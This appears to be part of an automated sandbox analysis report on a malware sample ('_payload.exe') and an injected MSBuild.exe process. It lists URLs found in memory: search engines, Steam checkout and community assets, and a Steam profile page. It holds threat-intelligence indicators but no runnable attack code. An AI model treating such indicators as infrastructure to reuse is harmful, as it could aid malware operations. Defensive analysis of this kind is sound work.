Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.a
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe String found in binary or memory: https://community.akamai.steamstatic.com/public/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=zGRpBs82SFHJ&a
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=GG0UCGgA
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, 
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=Dbzy
